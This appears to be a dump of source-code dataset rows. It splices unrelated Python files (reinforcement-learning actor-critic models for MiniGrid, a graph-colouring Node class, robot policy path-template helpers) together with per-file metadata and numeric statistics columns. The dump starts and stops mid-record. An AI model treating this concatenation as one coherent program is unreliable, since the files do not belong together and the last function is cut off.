def __init__(self): self.__class__ = type("Enum", (), dict(self.__class__.__dict__)) | 77.290323 | 88 | 0.721202 | 328 | 2,396 | 4.289634 | 0.146341 | 0.307036 | 0.221748 | 0.289979 | 0.780384 | 0.780384 | 0.780384 | 0.780384 | 0.780384 | 0.780384 | 0 | 0 | 0.095576 | 2,396 | 31 | 89 | 77.290323 | 0.649285 | 0.119366 | 0 | 0.84 | 0 | 0 | 0.048618 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.96 | false | 0 | 0 | 0 | 0.96 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 11 |
d456669b80b4dee20575bbf1adfdbdb22cbc5b03 | 60 | py | Python | john_doe/cities/united_states.py | xioren/JohnDoe | 4bd16f394709cac246438c8ffd650b4b301cb2b7 | [
"MIT"
] | null | null | null | john_doe/cities/united_states.py | xioren/JohnDoe | 4bd16f394709cac246438c8ffd650b4b301cb2b7 | [
"MIT"
] | null | null | null | john_doe/cities/united_states.py | xioren/JohnDoe | 4bd16f394709cac246438c8ffd650b4b301cb2b7 | [
"MIT"
] | null | null | null | from cities.us.states import *
from cities.us.zips import *
| 20 | 30 | 0.766667 | 10 | 60 | 4.6 | 0.6 | 0.434783 | 0.521739 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 60 | 2 | 31 | 30 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
# trojai_rl/modelgen/architectures/minigrid_architectures.py (trojai/trojai_rl, Apache-2.0 license)
import numpy as np
import cv2
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions.categorical import Categorical
import torch_ac
class BasicFCModel(nn.Module):
"""
    Fully connected Actor-Critic model. Fixed architecture that is small and quick to train.
Designed for default MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space, action_space):
"""
Initialize the model.
:param obs_space: (gym.Spaces) Observation space of the environment being used for training. Used to determine
the size of the input layer.
:param action_space: (gym.Spaces) Action space of the environment being used for training. Used to determine
            the size of the actor's output layer.
"""
super().__init__()
self.recurrent = False # required for using torch_ac package
self.preprocess_obss = None # Default torch_ac pre-processing works for this model
# Define state embedding
self.state_emb = nn.Sequential(
nn.Linear(np.prod(obs_space.shape), 100),
nn.ReLU(),
nn.Linear(100, 64),
nn.ReLU()
)
self.state_embedding_size = 64
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.state_embedding_size, 32),
nn.ReLU(),
nn.Linear(32, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.state_embedding_size, 32),
nn.ReLU(),
nn.Linear(32, 1)
)
def forward(self, obs):
x = obs.transpose(1, 3).transpose(2, 3).reshape(obs.size()[0], -1)
x = self.state_emb(x.float())
x = x.reshape(x.shape[0], -1)
x_act = self.actor(x)
dist = Categorical(logits=F.log_softmax(x_act, dim=1))
x_crit = self.critic(x)
value = x_crit.squeeze(1)
return dist, value
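For intuition, the policy head above builds a `Categorical` from log-softmax logits; a minimal pure-Python sketch (no torch; the logits are made-up numbers) of the same normalization over the 3 simplified MiniGrid actions:

```python
import math

def log_softmax(logits):
    # numerically stable log-softmax, mirroring F.log_softmax along the action axis
    m = max(logits)
    log_z = m + math.log(sum(math.exp(x - m) for x in logits))
    return [x - log_z for x in logits]

# hypothetical actor logits for one observation
logits = [2.0, -1.0, 0.5]
log_probs = log_softmax(logits)
probs = [math.exp(lp) for lp in log_probs]  # probabilities the Categorical samples from
```

The exponentiated log-probabilities sum to 1, which is exactly the invariant the `Categorical` distribution relies on.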
class SimplifiedRLStarter(nn.Module):
"""
Modified actor-critic model from https://github.com/lcswillems/rl-starter-files/blob/master/model.py.
Simplified to be easier to understand and used for early testing.
Designed for default MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space, action_space, grayscale=False):
"""
Initialize the model.
:param obs_space: (gym.Spaces) Observation space of the environment being used for training. Used to determine
the size of the embedding layer.
:param action_space: (gym.Spaces) Action space of the environment being used for training. Used to determine
            the size of the actor's output layer.
:param grayscale: (bool) Merge the three state-space arrays into one using an RGB to grayscale conversion, and
set the CNN to expect 1 channel instead of 3. NOT RECOMMENDED. Shrinks the observation space, which may
speed up training, but is likely unnecessary and may have unintended consequences.
"""
super().__init__()
self.recurrent = False # required for using torch_ac package
self.grayscale = grayscale
num_channels = 1 if grayscale else 3
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(num_channels, 16, (2, 2)),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(16, 32, (2, 2)),
nn.ReLU(),
nn.Conv2d(32, 64, (2, 2)),
nn.ReLU()
)
n = obs_space.shape[0]
m = obs_space.shape[1]
self.embedding_size = ((n - 1) // 2 - 2) * ((m - 1) // 2 - 2) * 64
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.embedding_size, 64),
nn.Tanh(),
nn.Linear(64, 64),
nn.Tanh(),
nn.Linear(64, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.embedding_size, 64),
nn.Tanh(),
nn.Linear(64, 64),
nn.Tanh(),
nn.Linear(64, 1)
)
# Initialize parameters correctly
self.apply(self.init_params)
def preprocess_obss(self, obss, device=None):
if self.grayscale: # simplify state space using grayscale conversion (even though it isn't an RGB image)
            if not isinstance(obss, (list, tuple)):
obss = [obss]
new_obss = []
for i in range(len(obss)):
new_obss.append(cv2.cvtColor(obss[i], cv2.COLOR_RGB2GRAY))
return torch.tensor(new_obss, device=device).unsqueeze(-1)
else:
# default torch_ac preprocess_obss call
return torch.tensor(obss, device=device)
# Function from https://github.com/ikostrikov/pytorch-a2c-ppo-acktr/blob/master/model.py
@staticmethod
def init_params(m):
classname = m.__class__.__name__
if classname.find("Linear") != -1:
m.weight.data.normal_(0, 1)
m.weight.data *= 1 / torch.sqrt(m.weight.data.pow(2).sum(1, keepdim=True))
if m.bias is not None:
m.bias.data.fill_(0)
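The row scaling in `init_params` can be checked without torch; a small sketch on plain lists (the 2x3 weight matrix is hypothetical) showing that each output row ends up with unit L2 norm:

```python
import math

def normalize_rows(weight):
    # mirror of init_params: divide each output row by its own L2 norm
    out = []
    for row in weight:
        norm = math.sqrt(sum(w * w for w in row))
        out.append([w / norm for w in row])
    return out

w = normalize_rows([[3.0, 4.0, 0.0], [1.0, 2.0, 2.0]])
row_norms = [math.sqrt(sum(x * x for x in row)) for row in w]
```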
def forward(self, obs):
x = obs.transpose(1, 3).transpose(2, 3)
x = self.image_conv(x.float())
x = x.reshape(x.shape[0], -1)
embedding = x
x = self.actor(embedding)
dist = Categorical(logits=F.log_softmax(x, dim=1))
x = self.critic(embedding)
value = x.squeeze(1)
return dist, value
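The `embedding_size` arithmetic in `__init__` can be sanity-checked in isolation; a sketch assuming MiniGrid's default 7x7 partial observation:

```python
def conv_embedding_size(n, m):
    # same arithmetic as self.embedding_size above:
    # 2x2 conv -> 2x2 maxpool -> 2x2 conv -> 2x2 conv, with 64 output channels
    return ((n - 1) // 2 - 2) * ((m - 1) // 2 - 2) * 64

size = conv_embedding_size(7, 7)  # MiniGrid's default agent view is 7x7
```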
class ModdedRLStarter(nn.Module, torch_ac.RecurrentACModel):
"""
Modified actor-critic model from https://github.com/lcswillems/rl-starter-files/blob/master/model.py.
Designed for default MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space, action_space, use_memory=True, layer_width=64):
"""
Initialize the model.
:param obs_space: (gym.Spaces) Observation space of the environment being used for training. Used to determine
the size of the embedding layer.
:param action_space: (gym.Spaces) Action space of the environment being used for training. Used to determine
            the size of the actor's output layer.
:param use_memory: (bool) Use the LSTM capability to add memory to the embedding. Required to be True if
recurrence is set to > 1 in torch_ac's PPO algorithm (via TorchACOptConfig). Mostly untested.
:param layer_width: (int) Number of nodes to put in each hidden layer used for the actor and critic.
"""
super().__init__()
# Since recurrence is optional for this model, we need to check and set this here.
if not use_memory:
self.recurrent = False
self.layer_width = layer_width
self.preprocess_obss = None # Use Default torch_ac pre-processing for this model
self.use_memory = use_memory
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(3, 16, (2, 2)),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(16, 32, (2, 2)),
nn.ReLU(),
nn.Conv2d(32, 64, (2, 2)),
nn.ReLU()
)
n = obs_space.shape[0]
m = obs_space.shape[1]
self.image_embedding_size = ((n - 1) // 2 - 2) * ((m - 1) // 2 - 2) * 64
if self.use_memory:
self.memory_rnn = nn.LSTMCell(self.image_embedding_size, self.semi_memory_size)
self.embedding_size = self.semi_memory_size
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.embedding_size, self.layer_width),
nn.Tanh(),
nn.Linear(self.layer_width, self.layer_width),
nn.Tanh(),
nn.Linear(self.layer_width, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.embedding_size, self.layer_width),
nn.Tanh(),
nn.Linear(self.layer_width, self.layer_width),
nn.Tanh(),
nn.Linear(self.layer_width, 1)
)
# Initialize parameters correctly
self.apply(self.init_params)
# Function from https://github.com/ikostrikov/pytorch-a2c-ppo-acktr/blob/master/model.py
@staticmethod
def init_params(m):
classname = m.__class__.__name__
if classname.find("Linear") != -1:
m.weight.data.normal_(0, 1)
m.weight.data *= 1 / torch.sqrt(m.weight.data.pow(2).sum(1, keepdim=True))
if m.bias is not None:
m.bias.data.fill_(0)
@property
def memory_size(self):
return 2 * self.semi_memory_size
@property
def semi_memory_size(self):
return self.image_embedding_size
def forward(self, obs, memory):
x = obs.transpose(1, 3).transpose(2, 3)
x = self.image_conv(x.float())
x = x.reshape(x.shape[0], -1)
if self.use_memory:
hidden = (memory[:, :self.semi_memory_size], memory[:, self.semi_memory_size:])
hidden = self.memory_rnn(x, hidden)
embedding = hidden[0]
memory = torch.cat(hidden, dim=1)
else:
embedding = x
x = self.actor(embedding)
dist = Categorical(logits=F.log_softmax(x, dim=1))
x = self.critic(embedding)
value = x.squeeze(1)
return dist, value, memory
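The flat memory vector torch_ac carries per observation is just the LSTM's `(h, c)` pair concatenated; a pure-Python sketch of the slicing done in `forward()` (with a made-up `semi_memory_size` of 4):

```python
S = 4                          # hypothetical semi_memory_size
memory = list(range(2 * S))    # flat per-observation memory vector

# forward() splits the vector into the LSTMCell's (h, c) pair ...
h, c = memory[:S], memory[S:]
# ... and packs the (possibly updated) pair back, like torch.cat(hidden, dim=1)
memory_out = h + c
```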
class ImageACModel(nn.Module):
"""
Simple CNN Actor-Critic model designed for MiniGrid with torch_ac. Contains pre-processing function that converts
the minigrid RGB observation to a 48x48 grayscale or RGB image.
Designed for RGB/Grayscale MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space, action_space, grayscale=False):
"""
Initialize the model.
:param obs_space: (gym.Spaces) Observation space of the environment being used for training. Technically unused
for this model, but stored both for consistency between models and to be used for later reference if needed.
:param action_space: (gym.Spaces) Action space of the environment being used for training. Used to determine
            the size of the actor's output layer.
:param grayscale: (bool) Convert RGB image to grayscale. Reduces the number of input channels to the first
convolution from 3 to 1.
"""
super().__init__()
self.recurrent = False # required for using torch_ac package
# technically don't need to be stored, but may be useful later.
self.obs_space = obs_space
self.action_space = action_space
self.image_size = 48 # this is the size of image this CNN was designed for
self.grayscale = grayscale
num_channels = 1 if grayscale else 3
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(num_channels, 8, (3, 3), stride=3),
nn.ReLU(),
nn.Conv2d(8, 16, (4, 4), stride=2),
nn.ReLU(),
nn.Conv2d(16, 32, (3, 3), stride=2),
nn.ReLU()
)
self.image_embedding_size = 3 * 3 * 32
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.image_embedding_size, 144),
nn.ReLU(),
nn.Linear(144, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.image_embedding_size, 144),
nn.ReLU(),
nn.Linear(144, 1)
)
def preprocess_obss(self, obss, device=None):
        if not isinstance(obss, (list, tuple)):
obss = [obss]
new_obss = []
for i in range(len(obss)):
if self.grayscale:
img = cv2.resize(cv2.cvtColor(obss[i], cv2.COLOR_RGB2GRAY), (self.image_size, self.image_size))
else:
img = cv2.resize(obss[i], (self.image_size, self.image_size))
new_obss.append(img)
if self.grayscale:
return torch.tensor(new_obss, device=device).unsqueeze(-1)
else:
return torch.tensor(new_obss, device=device)
def forward(self, obs):
x = obs.transpose(1, 3).transpose(2, 3)
x = self.image_conv(x.float())
x = x.reshape(x.shape[0], -1)
x_act = self.actor(x)
dist = Categorical(logits=F.log_softmax(x_act, dim=1))
x_crit = self.critic(x)
value = x_crit.squeeze(1)
return dist, value
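The hard-coded `image_embedding_size = 3 * 3 * 32` follows from the three strided convolutions applied to a 48x48 input; a sketch of the standard no-padding output-size formula:

```python
def conv_out(size, kernel, stride):
    # standard "valid" (no padding) convolution output size
    return (size - kernel) // stride + 1

s = 48                    # self.image_size
s = conv_out(s, 3, 3)     # first conv  -> 16
s = conv_out(s, 4, 2)     # second conv -> 7
s = conv_out(s, 3, 2)     # third conv  -> 3
embedding = s * s * 32    # matches image_embedding_size = 3 * 3 * 32
```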
class GRUActorCriticModel(nn.Module, torch_ac.RecurrentACModel):
"""
Modified actor-critic model from https://github.com/lcswillems/rl-starter-files/blob/master/model.py, using a GRU
in the embedding layer. Note that this model should have the 'recurrence' argument set to 1 in the TorchACOptimizer.
Designed for default MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space,
action_space,
rnn1_hidden_shape=64,
rnn1_n_layers=2,
rnn2_hidden_shape=64,
rnn2_n_layers=2,
fc_layer_width=64):
super().__init__()
self.preprocess_obss = None # Use Default torch_ac pre-processing for this model
self.layer_width = fc_layer_width
self.rnn1_n_layers = rnn1_n_layers
self.rnn1_hidden_shape = rnn1_hidden_shape
self.rnn2_n_layers = rnn2_n_layers
self.rnn2_hidden_shape = rnn2_hidden_shape
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(3, 16, (2, 2)),
nn.ReLU(),
nn.MaxPool2d((2, 2)),
nn.Conv2d(16, 32, (2, 2)),
nn.ReLU(),
nn.Conv2d(32, 64, (2, 2)),
nn.ReLU()
)
n = obs_space.shape[0]
m = obs_space.shape[1]
self.image_embedding_size = ((n - 1) // 2 - 2) * ((m - 1) // 2 - 2) * 64
self.rnn_layer1 = nn.GRU(self.image_embedding_size, self.rnn1_hidden_shape, num_layers=self.rnn1_n_layers)
self.rnn_layer2 = nn.GRU(self.rnn1_hidden_shape, self.rnn2_hidden_shape, num_layers=self.rnn2_n_layers)
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.rnn2_hidden_shape, self.layer_width),
nn.ReLU(),
nn.Linear(self.layer_width, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.rnn2_hidden_shape, self.layer_width),
nn.ReLU(),
nn.Linear(self.layer_width, 1)
)
@property
def memory_size(self):
return self.rnn1_hidden_shape * self.rnn1_n_layers + self.rnn2_hidden_shape * self.rnn2_n_layers
def forward(self, obs, memory):
x = obs.transpose(1, 3).transpose(2, 3)
x = self.image_conv(x.float())
x = x.reshape(x.shape[0], -1)
batch_size = memory.shape[0]
# construct previous hidden states from memory
h0_1 = memory[:, :(self.rnn1_hidden_shape * self.rnn1_n_layers)]\
.reshape(batch_size, self.rnn1_n_layers, self.rnn1_hidden_shape).transpose(0, 1).contiguous()
h0_2 = memory[:, (self.rnn1_hidden_shape * self.rnn1_n_layers):]\
.reshape(batch_size, self.rnn2_n_layers, self.rnn2_hidden_shape).transpose(0, 1).contiguous()
out, hidden = self.rnn_layer1(x.unsqueeze(0), h0_1)
memory1 = hidden.transpose(0, 1).reshape(batch_size, self.rnn1_hidden_shape * self.rnn1_n_layers)
embedding, hidden = self.rnn_layer2(out, h0_2)
memory2 = hidden.transpose(0, 1).reshape(batch_size, self.rnn2_hidden_shape * self.rnn2_n_layers)
# store all memories into a memory vector that will be associated with each observation.
memory = torch.cat((memory1, memory2), dim=1)
embedding = embedding.squeeze(0)
x = self.actor(embedding)
dist = Categorical(logits=F.log_softmax(x, dim=1))
x = self.critic(embedding)
value = x.squeeze(1)
return dist, value, memory
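With the default constructor arguments, the two stacked GRUs pack their hidden states into one flat vector per observation; a pure-Python sketch of the `memory_size` arithmetic and the `h0_1`/`h0_2` split used in `forward()`:

```python
rnn1_hidden, rnn1_layers = 64, 2   # defaults from __init__
rnn2_hidden, rnn2_layers = 64, 2

memory_size = rnn1_hidden * rnn1_layers + rnn2_hidden * rnn2_layers
split = rnn1_hidden * rnn1_layers  # boundary used to slice h0_1 / h0_2

memory = list(range(memory_size))
h0_1, h0_2 = memory[:split], memory[split:]
```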
class ImageGRUActorCriticModel(nn.Module, torch_ac.RecurrentACModel):
"""
Combination of ImageACModel and GRUActorCriticModel.
Modified actor-critic model from https://github.com/lcswillems/rl-starter-files/blob/master/model.py, using a GRU
in the embedding layer and has a modified CNN layer designed to accept 48x48 RGB or grayscale images.
Note that this model should have the 'recurrence' argument set to 1 in the TorchACOptimizer. Also contains
pre-processing function that converts the minigrid RGB observation to a 48x48 grayscale or RGB image.
Designed for RGB/Grayscale MiniGrid observation space and simplified action space (n=3).
"""
def __init__(self, obs_space,
action_space,
rnn1_hidden_shape=144,
rnn1_n_layers=2,
rnn2_hidden_shape=144,
rnn2_n_layers=2,
fc_layer_width=144,
grayscale=False):
super().__init__()
# keep track just for reference
self.obs_space = obs_space
self.action_space = action_space
self.layer_width = fc_layer_width
self.rnn1_n_layers = rnn1_n_layers
self.rnn1_hidden_shape = rnn1_hidden_shape
self.rnn2_n_layers = rnn2_n_layers
self.rnn2_hidden_shape = rnn2_hidden_shape
self.image_size = 48 # this is the size of image this CNN was designed for
self.grayscale = grayscale
num_channels = 1 if grayscale else 3
# Define image embedding
self.image_conv = nn.Sequential(
nn.Conv2d(num_channels, 8, (3, 3), stride=3),
nn.ReLU(),
nn.Conv2d(8, 16, (4, 4), stride=2),
nn.ReLU(),
nn.Conv2d(16, 32, (3, 3), stride=2),
nn.ReLU()
)
self.image_embedding_size = 3 * 3 * 32
self.rnn_layer1 = nn.GRU(self.image_embedding_size, self.rnn1_hidden_shape, num_layers=self.rnn1_n_layers)
self.rnn_layer2 = nn.GRU(self.rnn1_hidden_shape, self.rnn2_hidden_shape, num_layers=self.rnn2_n_layers)
# Define actor's model
self.actor = nn.Sequential(
nn.Linear(self.rnn2_hidden_shape, self.layer_width),
nn.ReLU(),
nn.Linear(self.layer_width, action_space.n)
)
# Define critic's model
self.critic = nn.Sequential(
nn.Linear(self.rnn2_hidden_shape, self.layer_width),
nn.ReLU(),
nn.Linear(self.layer_width, 1)
)
def preprocess_obss(self, obss, device=None):
        if not isinstance(obss, (list, tuple)):
obss = [obss]
new_obss = []
for i in range(len(obss)):
if self.grayscale:
img = cv2.resize(cv2.cvtColor(obss[i], cv2.COLOR_RGB2GRAY), (self.image_size, self.image_size))
else:
img = cv2.resize(obss[i], (self.image_size, self.image_size))
new_obss.append(img)
if self.grayscale:
return torch.tensor(new_obss, device=device).unsqueeze(-1)
else:
return torch.tensor(new_obss, device=device)
@property
def memory_size(self):
return self.rnn1_hidden_shape * self.rnn1_n_layers + self.rnn2_hidden_shape * self.rnn2_n_layers
def forward(self, obs, memory):
x = obs.transpose(1, 3).transpose(2, 3)
x = self.image_conv(x.float())
x = x.reshape(x.shape[0], -1)
batch_size = memory.shape[0]
# construct previous hidden states from memory
h0_1 = memory[:, :(self.rnn1_hidden_shape * self.rnn1_n_layers)]\
.reshape(batch_size, self.rnn1_n_layers, self.rnn1_hidden_shape).transpose(0, 1).contiguous()
h0_2 = memory[:, (self.rnn1_hidden_shape * self.rnn1_n_layers):]\
.reshape(batch_size, self.rnn2_n_layers, self.rnn2_hidden_shape).transpose(0, 1).contiguous()
out, hidden = self.rnn_layer1(x.unsqueeze(0), h0_1)
memory1 = hidden.transpose(0, 1).reshape(batch_size, self.rnn1_hidden_shape * self.rnn1_n_layers)
embedding, hidden = self.rnn_layer2(out, h0_2)
memory2 = hidden.transpose(0, 1).reshape(batch_size, self.rnn2_hidden_shape * self.rnn2_n_layers)
# store all memories into a memory vector that will be associated with each observation.
memory = torch.cat((memory1, memory2), dim=1)
embedding = embedding.squeeze(0)
x = self.actor(embedding)
dist = Categorical(logits=F.log_softmax(x, dim=1))
x = self.critic(embedding)
value = x.squeeze(1)
return dist, value, memory
# colouring/node.py (mattpaletta/coloured-graph-traversal, MIT license)
from colouring.colour import Colour
class Node(object):
def __init__(self, colour: Colour, id: int):
self._colour = colour
self.id = id
def get_colour(self) -> Colour:
return self._colour
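A minimal usage sketch; `Colour` is re-declared here as a stand-in enum (the real class lives in `colouring.colour` and its exact shape is assumed), and `Node` is repeated so the example is self-contained:

```python
from enum import Enum

class Colour(Enum):          # hypothetical stand-in for colouring.colour.Colour
    RED = 0
    BLUE = 1

class Node:
    def __init__(self, colour, id):
        self._colour = colour
        self.id = id

    def get_colour(self):
        return self._colour

n = Node(Colour.RED, 3)
```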
# policy_learning/path_templates.py (UT-Austin-RPL/BUDS, MIT license)
from models.conf_utils import *
from easydict import EasyDict
def output_parent_dir_template(cfg):
folder_path = cfg.folder
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/"
return output_dir
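A quick sketch of the template above with a minimal stand-in config (`SimpleNamespace` instead of `EasyDict`; the folder and dataset name are made up):

```python
from types import SimpleNamespace

cfg = SimpleNamespace(
    folder="/tmp/buds/",
    data=SimpleNamespace(dataset_name="demo"),
    skill_training=SimpleNamespace(run_idx=0),
)

# same f-string as output_parent_dir_template
output_dir = cfg.folder + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/"
```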
def single_subskill_path_template(cfg, subtask_id, use_changepoint=False):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
folder_path = cfg.folder
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/task_{cfg.multitask.training_task_id}_bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
if use_changepoint:
output_dir = f"{output_dir}_changepoint"
model_name = f"{output_dir}/{goal_str}{data_modality_str}_{cfg.skill_subgoal_cfg.subgoal_type}_subtask_{subtask_id}.pth"
summary_writer_name = f"{output_dir}/{goal_str}{data_modality_str}_subtask_{subtask_id}"
return EasyDict({"output_dir": output_dir,
"model_checkpoint_name": model_name,
"summary_writer_name": summary_writer_name})
def subskill_path_template(cfg, subtask_id, use_changepoint=False):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
folder_path = cfg.folder
if cfg.skill_subgoal_cfg is None and cfg.skill_training.policy_type == "no_subgoal":
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.skill_training.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.agglomoration.policy_type}"
else:
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
if use_changepoint:
output_dir = f"{output_dir}_changepoint"
model_name = f"{output_dir}/{goal_str}{data_modality_str}_{cfg.skill_subgoal_cfg.subgoal_type}_subtask_{subtask_id}.pth"
summary_writer_name = f"{output_dir}/{goal_str}{data_modality_str}_subtask_{subtask_id}"
return EasyDict({"output_dir": output_dir,
"model_checkpoint_name": model_name,
"summary_writer_name": summary_writer_name})
def single_skill_path_template(cfg):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
folder_path = cfg.folder
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
model_name = f"{output_dir}/{goal_str}{data_modality_str}_single_skill.pth"
summary_writer_name = f"{output_dir}/{goal_str}{data_modality_str}_single"
return EasyDict({"output_dir": output_dir,
"model_checkpoint_name": model_name,
"summary_writer_name": summary_writer_name})
def gti_path_template(cfg):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
folder_path = cfg.folder
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
model_name = f"{output_dir}/{goal_str}{data_modality_str}_gti.pth"
summary_writer_name = f"{output_dir}/{goal_str}{data_modality_str}_gti"
return EasyDict({"output_dir": output_dir,
"model_checkpoint_name": model_name,
"summary_writer_name": summary_writer_name})
def rpl_path_template(cfg):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
folder_path = cfg.folder
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/bc_mlp_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
model_name = f"{output_dir}/{goal_str}{data_modality_str}_rpl.pth"
summary_writer_name = f"{output_dir}/{goal_str}{data_modality_str}_rpl"
return EasyDict({"output_dir": output_dir,
"model_checkpoint_name": model_name,
"summary_writer_name": summary_writer_name})
def vae_path_template(cfg):
data_modality_str = get_data_modality_str(cfg)
modality_str = get_modalities_str(cfg)
goal_str = get_goal_str(cfg)
output_dir = f"results/{cfg.data.dataset_name}"
model_name = f"{output_dir}/subgoal_vae.pth"
return output_dir, model_name
def meta_path_template(cfg):
folder_path = cfg.folder
modality_str = get_modalities_str(cfg)
if cfg.skill_training.policy_type == "no_subgoal":
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}_{cfg.skill_training.policy_type}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}"
else:
output_dir = folder_path + f"results/{cfg.data.dataset_name}/run_{cfg.skill_training.run_idx}/meta_policy_{modality_str}_{cfg.repr.z_dim}/{cfg.agglomoration.footprint}_{cfg.agglomoration.dist}_{cfg.agglomoration.segment_footprint}_K{cfg.skill_training.agglomoration.K}_{cfg.agglomoration.affinity}_{cfg.skill_training.policy_type}_horizon_{cfg.skill_subgoal_cfg.horizon}_dim_{cfg.skill_subgoal_cfg.visual_feature_dimension}"
if cfg.meta.use_spatial_softmax:
spatial_softmax_str = "_spatial_softmax"
else:
spatial_softmax_str = ""
if cfg.meta_cvae_cfg.enable:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}_cvae"
else:
model_name = f"{output_dir}/meta_policy_{cfg.skill_subgoal_cfg.subgoal_type}_{cfg.meta_cvae_cfg.kl_coeff}_{cfg.meta_cvae_cfg.latent_dim}_False{spatial_softmax_str}"
if cfg.meta.random_affine:
model_name += "_data_aug"
summary_writer_name = model_name
model_name += ".pth"
